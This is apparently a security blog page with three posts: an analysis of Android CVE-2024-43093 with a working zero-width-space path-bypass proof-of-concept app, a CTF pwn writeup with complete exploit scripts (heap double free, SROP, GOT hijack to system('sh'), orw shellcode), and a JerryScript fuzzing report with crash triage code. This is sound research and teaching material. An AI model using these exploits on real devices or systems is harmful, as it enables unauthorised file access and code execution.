包含关键字 CVE 的文章

Android CVE 2024‑43093 漏洞分析

作者: rik
时间: 2026-01-16
分类: Android
评论

简介

CVE‑2024‑43093 是一个 Android 框架组件中的权限提升漏洞，其成因核心是文件路径过滤器在处理包含 Unicode 字符的路径时存在逻辑问题。出人意料的是，至今仍有不少安卓设备没有修复这个漏洞。使用 DuckDetector 可以检测这个漏洞在当前设备上是否修补。

成因

产生问题的代码位于 com/android/externalstorage/ExternalStorageProvider.java 中的 shouldHideDocument 函数。路径检查逻辑首先对文件路径进行规范化，本意是为了能正确匹配过滤规则，防止特殊字符注入。但是这种规范化不能防范所有字符的情况，例如零宽空格。如果在访问路径中插入零宽空格，那么就能绕过这个过滤规则，读写 /sdcard/Android/{data,obb}/<package> 任意目录。

修复

Google 早在 2024 年已尝试修复这个漏洞，将路径过滤规则从简单的正则匹配改为使用 Java File 逐级遍历验证路径是否相同，但仍然无法阻挡这个漏洞。修复 patch diff 如下：

@@ -16,8 +16,6 @@
 
 package com.android.externalstorage;
 
-import static java.util.regex.Pattern.CASE_INSENSITIVE;
-
 import android.annotation.NonNull;
 import android.annotation.Nullable;
 import android.app.usage.StorageStatsManager;
@@ -61,12 +59,15 @@
 import java.io.FileNotFoundException;
 import java.io.IOException;
 import java.io.PrintWriter;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Arrays;
 import java.util.Collections;
 import java.util.List;
 import java.util.Locale;
 import java.util.Objects;
 import java.util.UUID;
-import java.util.regex.Pattern;
+import java.util.stream.Collectors;
 
 /**
  * Presents content of the shared (a.k.a. "external") storage.
@@ -89,12 +90,9 @@
     private static final Uri BASE_URI =
             new Uri.Builder().scheme(ContentResolver.SCHEME_CONTENT).authority(AUTHORITY).build();
 
-    /**
-     * Regex for detecting {@code /Android/data/}, {@code /Android/obb/} and
-     * {@code /Android/sandbox/} along with all their subdirectories and content.
-     */
-    private static final Pattern PATTERN_RESTRICTED_ANDROID_SUBTREES =
-            Pattern.compile("^Android/(?:data|obb|sandbox)(?:/.+)?", CASE_INSENSITIVE);
+    private static final String PRIMARY_EMULATED_STORAGE_PATH = "/storage/emulated/";
+
+    private static final String STORAGE_PATH = "/storage/";
 
     private static final String[] DEFAULT_ROOT_PROJECTION = new String[] {
             Root.COLUMN_ROOT_ID, Root.COLUMN_FLAGS, Root.COLUMN_ICON, Root.COLUMN_TITLE,
@@ -309,11 +307,70 @@
             return false;
         }
 
-        final String path = getPathFromDocId(documentId);
-        return PATTERN_RESTRICTED_ANDROID_SUBTREES.matcher(path).matches();
+        try {
+            final RootInfo root = getRootFromDocId(documentId);
+            final String canonicalPath = getPathFromDocId(documentId);
+            return isRestrictedPath(root.rootId, canonicalPath);
+        } catch (Exception e) {
+            return true;
+        }
     }
 
     /**
+     * Based on the given root id and path, we restrict path access if file is Android/data or
+     * Android/obb or Android/sandbox or one of their subdirectories.
+     *
+     * @param canonicalPath of the file
+     * @return true if path is restricted
+     */
+    private boolean isRestrictedPath(String rootId, String canonicalPath) {
+        if (rootId == null || canonicalPath == null) {
+            return true;
+        }
+
+        final String rootPath;
+        if (rootId.equalsIgnoreCase(ROOT_ID_PRIMARY_EMULATED)) {
+            // Creates "/storage/emulated/<user-id>"
+            rootPath = PRIMARY_EMULATED_STORAGE_PATH + UserHandle.myUserId();
+        } else {
+            // Creates "/storage/<volume-uuid>"
+            rootPath = STORAGE_PATH + rootId;
+        }
+        List<java.nio.file.Path> restrictedPathList = Arrays.asList(
+                Paths.get(rootPath, "Android", "data"),
+                Paths.get(rootPath, "Android", "obb"),
+                Paths.get(rootPath, "Android", "sandbox"));
+        // We need to identify restricted parent paths which actually exist on the device
+        List<java.nio.file.Path> validRestrictedPathsToCheck = restrictedPathList.stream().filter(
+                Files::exists).collect(Collectors.toList());
+
+        boolean isRestricted = false;
+        java.nio.file.Path filePathToCheck = Paths.get(rootPath, canonicalPath);
+        try {
+            while (filePathToCheck != null) {
+                for (java.nio.file.Path restrictedPath : validRestrictedPathsToCheck) {
+                    if (Files.isSameFile(restrictedPath, filePathToCheck)) {
+                        isRestricted = true;
+                        Log.v(TAG, "Restricting access for path: " + filePathToCheck);
+                        break;
+                    }
+                }
+                if (isRestricted) {
+                    break;
+                }
+
+                filePathToCheck = filePathToCheck.getParent();
+            }
+        } catch (Exception e) {
+            Log.w(TAG, "Error in checking file equality check.", e);
+            isRestricted = true;
+        }
+
+        return isRestricted;
+    }
+
+
+    /**
      * Check that the directory is the root of storage or blocked file from tree.
      * <p>
      * Note, that this is different from hidden documents: blocked documents <b>WILL</b> appear

后来 Google 也尝试直接在内核中修改 F2FS 文件系统，但也未能完成修复。（据说还因把 F2FS 弄坏了被 Linus 批评。）真正的修复可以参考 5ec1cff 编写的 Xposed 模块。我用 jadx 逆向分析了一下，这个模块在 Xposed entry 中对 com.android.providers.media.module 注入了一个动态链接库 fusefixer.so：

    public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) {
        if ("com.android.providers.media.module".equals(loadPackageParam.packageName) || "com.google.android.providers.media.module".equals(loadPackageParam.packageName)) {
            System.loadLibrary("fusefixer");
            Log.d("FuseFixer", "injected");
            new Handler(Looper.getMainLooper()).post(new RunnableC0016i(0, this));
        }
    }

在其中又 hook 了 libfuse_jni.so 中的 is_package_owned_path、is_app_accessible_path 和 is_bpf_backing_path。替换后的函数做了以下操作：

先判断输入字符串是否包含需要处理的 Unicode 字符；
如果需要处理，复制出一份可写字符串，扫描该字符串并移除非法字符；
调用原始函数，修改传入参数为清洗后的字符串。

据说 Google 在 2026 年一月更新中再次修补了这个漏洞，等我的设备收到更新后我将再次验证。

复现

由于这是一个披露已久的漏洞，所以应该可以展示复现过程。其实只需要简单编写一个类似文件管理器的程序（我这里选用 Jetpack Compose 框架），让用户输入路径支持 Unicode 转义符或自行插入零宽 Unicode 字符就可以了。我在目前最新的澎湃 OS 3.0.5.0 仍能成功复现这个漏洞。

package cn.pwnerik.pathescape

import android.os.Bundle
import androidx.activity.ComponentActivity
import androidx.activity.compose.setContent
import androidx.activity.enableEdgeToEdge
import androidx.compose.foundation.clickable
import androidx.compose.foundation.layout.*
import androidx.compose.foundation.lazy.LazyColumn
import androidx.compose.foundation.lazy.items
import androidx.compose.material3.*
import androidx.compose.runtime.*
import androidx.compose.ui.Alignment
import androidx.compose.ui.Modifier
import androidx.compose.ui.text.TextRange
import androidx.compose.ui.text.input.TextFieldValue
import androidx.compose.ui.tooling.preview.Preview
import androidx.compose.ui.unit.dp
import cn.pwnerik.pathescape.ui.theme.PathEscapeTheme
import java.io.File

class MainActivity : ComponentActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        enableEdgeToEdge()
        setContent {
            PathEscapeTheme {
                Scaffold(modifier = Modifier.fillMaxSize()) { innerPadding ->
                    FileExplorer(
                        modifier = Modifier.padding(innerPadding)
                    )
                }
            }
        }
    }
}

fun unescapeUnicode(input: String): String {
    val regex = Regex("\\\\u([0-9a-fA-F]{4})")
    return regex.replace(input) {
        try {
            it.groupValues[1].toInt(16).toChar().toString()
        } catch (_: Exception) {
            it.value
        }
    }
}

fun escapeUnicode(input: String): String {
    val sb = StringBuilder()
    for (char in input) {
        if (char.code !in 32..126) {
            sb.append(String.format("\\u%04x", char.code))
        } else {
            sb.append(char)
        }
    }
    return sb.toString()
}

@Composable
fun FileExplorer(modifier: Modifier = Modifier) {
    var pathValue by remember { mutableStateOf(TextFieldValue("")) }
    var files by remember { mutableStateOf(listOf<File>()) }
    var parentDir by remember { mutableStateOf<File?>(null) }
    var errorMessage by remember { mutableStateOf<String?>(null) }
    var hasStarted by remember { mutableStateOf(false) }

    fun listFiles(path: String) {
        val decodedPath = unescapeUnicode(path)
        val directory = File(decodedPath)
        
        // Always update the input box to show the normalized escaped path
        val escapedPath = escapeUnicode(directory.absolutePath)
        pathValue = TextFieldValue(
            text = escapedPath,
            selection = TextRange(escapedPath.length)
        )

        try {
            if (directory.exists() && directory.isDirectory) {
                val list = directory.listFiles()
                files = list?.toList()?.sortedWith(compareBy({ !it.isDirectory }, { it.name.lowercase() })) ?: emptyList()
                parentDir = directory.parentFile
                errorMessage = null
                hasStarted = true
            } else {
                errorMessage = "无效的目录路径: $decodedPath"
                files = emptyList()
                parentDir = null
            }
        } catch (e: Exception) {
            errorMessage = "错误: ${e.message}"
            files = emptyList()
            parentDir = null
        }
    }

    fun insertAtCursor(textToInsert: String) {
        val text = pathValue.text
        val selection = pathValue.selection
        val newText = text.take(selection.start) + textToInsert + text.substring(selection.end)
        val newCursorPosition = selection.start + textToInsert.length
        pathValue = TextFieldValue(
            text = newText,
            selection = TextRange(newCursorPosition)
        )
    }

    Column(
        modifier = modifier
            .fillMaxSize()
            .padding(16.dp)
    ) {
        Row(
            modifier = Modifier.fillMaxWidth(),
            verticalAlignment = Alignment.CenterVertically
        ) {
            TextField(
                value = pathValue,
                onValueChange = { pathValue = it },
                modifier = Modifier.weight(1f),
                label = { Text("目录路径") },
                singleLine = true
            )
            Spacer(modifier = Modifier.width(8.dp))
            Button(onClick = { listFiles(pathValue.text) }) {
                Text("列出")
            }
        }

        Spacer(modifier = Modifier.height(8.dp))

        Row(
            modifier = Modifier.fillMaxWidth(),
            horizontalArrangement = Arrangement.spacedBy(8.dp)
        ) {
            OutlinedButton(onClick = { insertAtCursor("/storage/emulated/0") }) {
                Text("主目录")
            }
            OutlinedButton(onClick = { insertAtCursor("\\u200d") }) {
                Text("零宽空格")
            }
            OutlinedButton(onClick = { pathValue = TextFieldValue("", TextRange.Zero) }) {
                Text("清空")
            }
        }

        Spacer(modifier = Modifier.height(16.dp))

        if (errorMessage != null) {
            Text(
                text = errorMessage!!,
                color = MaterialTheme.colorScheme.error,
                modifier = Modifier.padding(bottom = 8.dp)
            )
        }

        LazyColumn(modifier = Modifier.fillMaxSize()) {
            // Add parent directory link if not at root and after first listing
            if (hasStarted && parentDir != null) {
                item {
                    FileItem(
                        name = "..",
                        isDirectory = true,
                        onClick = { listFiles(parentDir!!.absolutePath) }
                    )
                    HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
                }
            }
            
            items(files) { file ->
                FileItem(
                    name = file.name,
                    isDirectory = file.isDirectory,
                    onClick = {
                        if (file.isDirectory) {
                            listFiles(file.absolutePath)
                        }
                    }
                )
                HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
            }
        }
    }
}

@Composable
fun FileItem(name: String, isDirectory: Boolean, onClick: () -> Unit) {
    val type = if (isDirectory) "[目录] " else "[文件] "
    Text(
        text = "$type$name",
        modifier = Modifier
            .fillMaxWidth()
            .clickable(onClick = onClick)
            .padding(vertical = 12.dp),
        style = MaterialTheme.typography.bodyLarge
    )
}

@Preview(showBackground = true)
@Composable
fun FileExplorerPreview() {
    PathEscapeTheme {
        FileExplorer()
    }
}

复现截图

羊城杯 2025 初赛 Pwn Writeup

作者: rik
时间: 2025-10-16
分类: 二进制安全
评论

malloc

自定义堆内存管理器。

堆块结构：

| Offset | Field          | Description                        |
|---------|----------------|------------------------------------|
| +0      | in_use (1B)    | 1 = allocated, 0 = free            |
| +1..7   | padding        | for 8-byte alignment               |
| +8      | size (4B)      | total size of the chunk            |
| +12..15 | padding        | (align next pointer)               |
| +16     | next (8B)      | pointer to next free chunk         |
| +16     | user data start| returned to caller (malloc result) |

delete 时存在 UAF，且 double free 检测深度只有 13，而我们最多可以申请 16 个堆块。double free 后再多次 create 得到重叠堆块，修改 next 指针得到任意地址（目标地址 - 16）分配，从而任意地址读写。

泄露 libc、stack 基地址后任意分配到栈上写 ROP，返回至提前布置好的 shellcode。程序沙箱禁用 execve 等系统调用，考虑 orw。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='info')
binary = './pwn'
# io = process(binary)
io = connect('45.40.247.139', 18565)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

# 0x0f < size <= 0x70
def create(index: int, size: int):
    io.sendlineafter(b'=======================\n', b'1')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))

def delete(index: int):
    io.sendlineafter(b'=======================\n', b'2')
    io.sendlineafter(b'Index\n', itob(index))

def edit(index: int, size: int, content: bytes):
    io.sendlineafter(b'=======================\n', b'3')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))
    io.send(content)

def show(index: int):
    io.sendlineafter(b'=======================\n', b'4')
    io.sendlineafter(b'Index\n', itob(index))

def exitit():
    io.sendlineafter(b'=======================\n', b'5')

for i in range(15):
    create(i, 0x10)
for i in range(15):
    delete(i)
delete(0) # double free
show(14) # leak heap (elf)
e.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x53a0
print_leaked('elf_base', e.address)
create(0, 0x10)
edit(0, 8, p64(e.sym['stdout'] - 16)) # `next` -> stdout
for _ in range(16):
    create(1, 0x10)
show(1)
libc.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x21b780
print_leaked('libc_base', libc.address)

for i in range(15):
    create(i, 0x20)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x20)
edit(0, 8, p64(libc.sym['environ'] - 16)) # `next` -> environ
for _ in range(16):
    create(1, 0x20)
show(1)
stack_addr = u64(io.recvline(False).ljust(8, b'\x00'))
print_leaked('stack_addr', stack_addr)

for i in range(15):
    create(i, 0x70)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x70)
edit(0, 8, p64(stack_addr - 0x140 - 16)) # `next` -> stack retaddr
for _ in range(16):
    create(1, 0x70)
# gdb.attach(io, 'b *$rebase(0x18F2)')
edit(0, 0x70, asm(f"""
    mov rax, 0x67616c662f
    push rax

    mov rax, __NR_open
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall

    mov rax, __NR_read
    mov rdi, 3
    mov rsi, rsp
    mov rdx, 0x50
    syscall

    mov rax, __NR_write
    mov rdi, 1
    mov rsi, rsp
    mov rdx, 0x50
    syscall
"""))
edit(1, 0x70, flat([
    libc.search(asm('pop rdi;ret')).__next__(),
    e.address + 0x5000,
    libc.search(asm('pop rsi;ret')).__next__(),
    0x1000,
    libc.search(asm('pop rdx;pop r12;ret')).__next__(),
    7,
    0,
    libc.sym['mprotect'],
    e.address + 0x56c0
]))

io.interactive()

stack

看起来是堆溢出但其实会栈迁移到堆上，溢出改返回地址爆破 PIE 到 magic。

由于随机数种子来自已知时间，所以可以预测随机数，逆运算得到 PIE 基地址。

最后栈迁移到 bss 段，利用 SROP 和 syscall gadget 实现任意系统调用。程序 seccomp 沙箱禁用了 open、execve 等系统调用，考虑 openat 替代。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'])
binary = './Stack_Over_Flow'
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

while True:
    global io, elf_base
    io = connect('45.40.247.139', 30871)
    libc_lib = CDLL('/usr/lib/libc.so.6')
    libc_lib.srand(libc_lib.time(0))
    libc_lib.rand() % 5
    libc_lib.rand() % 5
    key = libc_lib.rand() % 5
    try:
        io.sendafter(b'luck!\n', cyclic(0x2000)[:cyclic(0x2000).index(b'qaacraac')] + b'\x5F\x13')
        
        if b'magic' not in io.recvuntil(b':'):
            io.close()
            continue
        e.address = (int(io.recvline(False)) // key) - 0x16b0
        break
    except Exception:
        io.close()
        continue

context.log_level = 'debug'

print_leaked('elf_base', e.address)

syscall = e.address + 0x000000000000134f
fake_stack = e.bss(0x800)

# stack mig
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_stack
frame.rdx = 0x800
frame.rip = syscall
frame.rsp = fake_stack

# gdb.attach(io, 'b *$rebase(0x16A4)')
io.sendafter(b'luck!\n', flat([
    cyclic(0x100),
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
]))
pause()
io.send(cyclic(0xf))

# mprotect
frame = SigreturnFrame()
frame.rax = 10
frame.rdi = fake_stack & ~0xfff
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = syscall
frame.rsp = fake_stack + 0x200

xor_rax_pop_rbp = e.address + 0x00000000000016a0

payload = flat([
    0,
    xor_rax_pop_rbp,
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
])
payload = payload.ljust(0x200, b'\x00')
payload += flat([
    0,
    fake_stack + 0x300
])
payload = payload.ljust(0x300, b'\x00')
payload += asm("""
    push 0x50
    lea rax, [rsp - 0x60]
    push rax

    mov rax, 0x67616c662f
    push rax

    push __NR_openat ; pop rax
    xor rdi, rdi
    push rsp ; pop rsi
    xor rdx, rdx
    xor r10, r10
    syscall
    push rax

    push __NR_readv ; pop rax
    pop rdi
    popf
    push rsp ; pop rsi
    push 1 ; pop rdx
    syscall

    push __NR_writev ; pop rax
    push 1 ; pop rdi
    syscall
""")
pause()
io.send(payload)
pause()
io.send(cyclic(0xf))

io.interactive()

mvmps

参考软件系统安全赛 - vm。

00000000 struct __attribute__((packed)) __attribute__((aligned(1))) VM // sizeof=0x49
00000000 {
00000000     char *vmcode;
00000008     int pc;
0000000C     int field_C;
00000010     __int64 regs[6];
00000040     int64_t sp;
00000048     BYTE field_48;
00000049 };

SUB SP 时栈指针下溢，PUSH 和 POP 操作变成 ELF 几乎任意地址读写。

不是 PIE，劫持 GOT 即可。读取 read@got 低 4 字节，减去偏移得到 system 地址，将其写回 read@got 低 4 字节，内存中写入 "sh"，执行 read 并传入首个参数为 "sh" 地址。指令有四种格式。具体见下方 exp 注释。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './vvmm'
# io = process(binary)
io = connect('45.40.247.139', 15101)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)
# gdb.attach(io, 'b *0x401CBF\nb *0x4015AA\nb *0x401CC6\nb *0x402742\nb *0x4025E7\nb *0x4014AF\nb *0x4015CE')

def INST(opcode: int, type: int, *args) -> bytes:
    header = p8(opcode << 2 | type)
    if type == 0:
        return header + p8((args[0] & 0xff0000) >> 16) + p8((args[0] & 0xff00) >> 8) + p8(args[0] & 0xff)
    if type == 1:
        return header + p8(args[0])
    if type == 2:
        return header + p8(args[0]) + p8(args[1])
    if type == 3:
        return header + p8(args[0]) + p32(args[1])
    raise ValueError("Invalid type.")

io.sendafter(b'Please input your opcodes:\n', b''.join([
    INST(0x24, 0, 0x418), # SUB SP (to read@got)
    INST(0x20, 1, 0), # read from elf (read@got)
    INST(0xb, 3, 0, 0xc3a60), # REG SUB (offset of read & system)
    INST(0x1f, 1, 0), # write to elf (system)
    INST(0x3, 3, 1, 0x6873), # LOAD IMM ("sh")
    INST(0x25, 0, 0x30), # ADD SP (arbitrary mem)
    INST(0x1f, 1, 1), # write to elf ("sh")
    INST(0x3, 3, 0, 0x4050fc), # LOAD IMM (arbitrary mem)
    INST(0x33, 0, 0), # SYSCALL (read@plt -> system with arg "sh")
]))

io.interactive()

再次尝试 Fuzzing —— JerryScript

作者: rik
时间: 2025-08-20
分类: 二进制安全
评论

开始之前

这段时间本来想入门 Chrome V8，学了一段时间发现 V8 还是太吃操作了……感觉应该先了解下比较简单的 JS 引擎。于是想着先从适合嵌入式设备的轻量 JS 引擎 JerryScript 开始玩起。正好看到 JerryScript 的 Issues 有好多关于漏洞的报告~~（无人在意说是）~~，那就复现一下 fuzzing 漏洞挖掘吧。

源码与编译

git clone https://github.com/jerryscript-project/jerryscript
cd jerryscript
python tools/build.py

编译 JerryScript 还是相当简单的，要想 fuzz 它，我们可以直接让 AFL 将文件作为参数传入然后等待崩溃。但是这样的 fuzz 是没有意义的，因为没有经过 AFL instruction。我们需要使用 afl-clang-lto 作为编译器。有关 AFL 的用法和原理，前人之述备矣，我就不赘述了。

JerryScript 已经在 tools/build.py 为我们准备好了接入 libfuzzer 的编译选项，而 AFL 支持为 libfuzzer sanitized binary 启用 persistent mode。那么就用现成的就好。

CC=afl-clang-lto python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum-conversion' --strip=OFF
CC=afl-clang-lto AFL_LLVM_CMPLOG=1 python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum  
-conversion -fsanitize=address' --strip=OFF

我们需要添加 -Wno-enum-enum-conversion 编译参数来防止高版本 clang 编译不通过。（如果要用高版本 gcc 编译的话，还需要添加 -Wno-unterminated-string-initialization，因为 jerry-core/ecma/builtin-objects/ecma-builtin-helpers-date.c 中的 day_names_p 和 month_names_p 没有考虑 C-style 字符串字面量 tailing NULL byte 占用的空间。）

准备初始 corpus

作为实验，我没有考虑太多，选用 test262 作为 JS 样本，去除其中的注释，就直接作为初始 corpus 了。我选用 AFL 作为 fuzzing 引擎。这对于 JS 引擎而言，效果不会好，但本来也只是实验性质的尝试。AFL 在 fuzz 过程中会根据这些文件不断通过各种策略构造新的输入，收集对于每个输入程序执行后的覆盖率，继续构造新的输入。

import os
import shutil
import subprocess

TEST262_REPO = "https://github.com/tc39/test262.git"
CLONE_DIR = "test262"
CORPUS_DIR = "corpus"
NUM_FILES = 100  # Adjust how many files you want

# Directories considered ES5 core tests
ES5_TEST_DIRS = [
    "test/built-ins",
    "test/language",
    "test/statements",
    "test/annexB"
]

def clone_test262():
    if not os.path.exists(CLONE_DIR):
        print("Cloning test262 repo...")
        subprocess.run(["git", "clone", TEST262_REPO], check=True)
    else:
        print("test262 repo already cloned.")

def gather_es5_js_files():
    js_files = []
    for root, _, files in os.walk(CLONE_DIR):
        # Check if the file is inside one of the ES5 directories
        if any(es5_dir in root.replace("\\", "/") for es5_dir in ES5_TEST_DIRS):
            for file in files:
                if file.endswith(".js"):
                    js_files.append(os.path.join(root, file))
    return js_files

def prepare_corpus(js_files):
    os.makedirs(CORPUS_DIR, exist_ok=True)
    selected_files = js_files[:NUM_FILES]
    print(f"Copying {len(selected_files)} files to corpus directory...")
    existing_names = set()

    for path in selected_files:
        filename = os.path.basename(path)
        name, ext = os.path.splitext(filename)

        # Avoid duplicates by renaming with suffix if needed
        original_filename = filename
        suffix = 1
        while filename in existing_names:
            filename = f"{name}_{suffix}{ext}"
            suffix += 1

        existing_names.add(filename)
        shutil.copy(path, os.path.join(CORPUS_DIR, filename))

    print("Corpus preparation complete.")

if __name__ == "__main__":
    clone_test262()
    all_js_files = gather_es5_js_files()
    if len(all_js_files) == 0:
        print("No ES5 JS files found in test262 repo!")
    else:
        prepare_corpus(all_js_files)

fuzzing

afl-fuzz -i input -o output -b 2 -a text -M master -- ./jerry-libfuzzer
AFL_USE_ASAN=1 afl-fuzz -i input -o output -b 4 -a text -S sanitizer -c 0 -l 2AT -P exploit -p exploit -- ./jerry-libfuzzer

很快就发生了 crash。可以看到 AFL 构造的 JS 输入和乱码真的没区别了。也就是说 JerryScript 在语法分析甚至词法分析阶段就可能崩溃，发生段错误。

结果处理

虽然听起来有点离谱，但是挂机一天后 AFL 收集到了 543 个 crashes。但其中大多数都是 null pointer deref。所以我决定简单筛选一下无效的 crashes。使用 Python gdb 模块批量调试 crash inputs，段错误后先提取产生段错误位置的汇编指令，找到解引用 [reg + offset]（寄存器间接寻址）处使用的寄存器，然后再让 gdb 查询这个寄存器的值，如果值为很大的数则将这个 input 另存起来。

import gdb
import os
import shlex
import shutil
import re
from pathlib import Path

# ====== Configuration ======
CRASH_DIR = Path("./crashes")
VALID_DIR = Path("./valid")
LOG_DIR = Path("./logs")
MODE = "copy"   # "copy" or "link"
PATTERN = "cafebabe"   # if NOT found in crash bt/output -> save to VALID_DIR
USE_STDIN = False    # If True, run "run < file" to feed the file on stdin
# Note: timeouts are not enforced inside gdb-embedded script; if you need per-run
# timeouts, run gdb under an external timeout wrapper (e.g. GNU timeout) or use
# the external/python+subprocess approach.
# ===========================

CRASH_DIR = CRASH_DIR.resolve()
VALID_DIR = VALID_DIR.resolve()
LOG_DIR = LOG_DIR.resolve()

x86_64_registers = [
    "rax", "rbx", "rcx", "rdx",
    "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11",
    "r12", "r13", "r14", "r15"
]

for d in (VALID_DIR, LOG_DIR):
    d.mkdir(parents=True, exist_ok=True)

# helper: unique destination path (avoid overwriting)
def unique_dest(dest: Path) -> Path:
    if not dest.exists():
        return dest
    i = 1
    while True:
        candidate = dest.with_name(dest.name + f".{i}")
        if not candidate.exists():
            return candidate
        i += 1

def install_file(src: Path) -> Path:
    dest = VALID_DIR / src.name
    dest = unique_dest(dest)
    if MODE == "link":
        # try symlink to absolute path
        try:
            os.symlink(str(src.resolve()), str(dest))
        except OSError:
            shutil.copy2(src, dest)
    else:
        shutil.copy2(src, dest)
    return dest

CRASH_PATTERNS = [
    r"Program received signal",
    r"SIGSEGV",
    r"SIGABRT",
    r"Segmentation fault",
    r"SIGILL",
    r"SIGFPE",
    r"^#0",            # backtrace frame 0
    r"AddressSanitizer",
    r"ASAN:",
    r"terminate called",
]

_crash_re = re.compile("|".join("(?:" + p + ")" for p in CRASH_PATTERNS), flags=re.I | re.M)

def detect_crash(text: str) -> bool:
    return bool(_crash_re.search(text))

# Turn off pagination so gdb.execute(..., to_string=True) returns full text
try:
    gdb.execute("set pagination off")
except Exception:
    pass

# The program to run is the one passed with --args ./jerry when launching gdb.
# gdb already knows the executable from --args; we will just set program args each run.
files = sorted([p for p in CRASH_DIR.iterdir() if p.is_file()])

summary = {"processed": 0, "crashes": 0, "saved": 0, "no_crash": 0}

for infile in files:
    summary["processed"] += 1
    name = infile.name
    logfile = LOG_DIR / (name + ".log")
    print("---- Processing:", name)

    # Set args or use stdin redirection
    if USE_STDIN:
        # clear any args (not necessary, but explicit)
        try:
            gdb.execute("set args")
        except Exception:
            pass
        run_cmd = "run < " + shlex.quote(str(infile))
    else:
        # set argv for the debugged program to the filename
        # (if your program accepts multiple args, adjust as needed)
        try:
            gdb.execute("set args " + shlex.quote(str(infile)))
        except Exception:
            pass
        run_cmd = "run"

    # Execute run and capture textual output
    try:
        out_run = gdb.execute(run_cmd, to_string=True)
    except gdb.error as e:
        # gdb.error may be thrown if the program exited in a way gdb treats specially;
        # capture the string representation and continue to collect bt below.
        out_run = str(e)

    # After run, collect a backtrace (best-effort)
    try:
        out_bt = gdb.execute("bt full", to_string=True)
    except Exception:
        try:
            out_bt = gdb.execute("bt", to_string=True)
        except Exception:
            out_bt = ""

    combined = out_run + "\n" + out_bt

    # Save log
    with logfile.open("w", encoding="utf-8", errors="replace") as f:
        f.write("COMMAND: " + run_cmd + "\n\n")
        f.write("=== RUN OUTPUT ===\n")
        f.write(out_run + "\n\n")
        f.write("=== BACKTRACE ===\n")
        f.write(out_bt + "\n")

    # Detect crash
    if detect_crash(combined):
        summary["crashes"] += 1
        crash_line = gdb.execute('x/i $rip', to_string=True)
        valid = False
        if "[" not in crash_line:
            continue
        for reg in x86_64_registers:
            if reg in crash_line[crash_line.index("["):crash_line.index("]")] and int(gdb.execute(f"p ${reg}", to_string=True).split(' ')[-1], 16) > 8:
                valid = True
        if not valid:
            continue
        print("  -> Valid crash detected. Log:", logfile)
        if PATTERN.lower() in combined.lower():
            print(f"     -> pattern '{PATTERN}' FOUND in backtrace/output. Not saving.")
        else:
            dest = install_file(infile)
            summary["saved"] += 1
            print(f"     -> pattern '{PATTERN}' NOT found. Saved to:", dest)
    else:
        summary["no_crash"] += 1
        print("  -> No crash detected. Log:", logfile)

    # Attempt to kill inferior if still running so we can restart cleanly next time
    try:
        gdb.execute("kill", to_string=True)
    except Exception:
        # ignore; keep going
        pass

# Final summary
print("\nDone.")
print("Summary:")
for k, v in summary.items():
    print(f"  {k}: {v}")
print("Logs:", LOG_DIR)
print("Valid candidates:", VALID_DIR)

# End of gdb_run.py

经过筛选后，我发现了一个很有意思的崩溃：

$ ./jerry-asan /storage/jsfuzz/valid/id:000005,sig:11,src:005743,time:469380,execs:12877861,op:havo
c,rep:4
=================================================================
==1365920==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7b6b9b700098 at pc 0x558aff052c4d bp 0x7ffcb9f80e60 sp 0x7ffcb9f80e50
READ of size 1 at 0x7b6b9b700098 thread T0
    #0 0x558aff052c4c in scanner_create_variables (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #1 0x558aff0551bc in parser_parse_function_arguments.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7b1bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #2 0x558aff0585c8 in parser_parse_function (/storage/jsfuzz/jerry-asan+0x7e5c8) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #3 0x558aff0a26bc in lexer_construct_function_object (/storage/jsfuzz/jerry-asan+0xc86bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #4 0x558aff0a6a77 in parser_parse_class (/storage/jsfuzz/jerry-asan+0xcca77) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #5 0x558aff0b6198 in parser_parse_statements (/storage/jsfuzz/jerry-asan+0xdc198) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #6 0x558aff057d49 in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7dd49) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
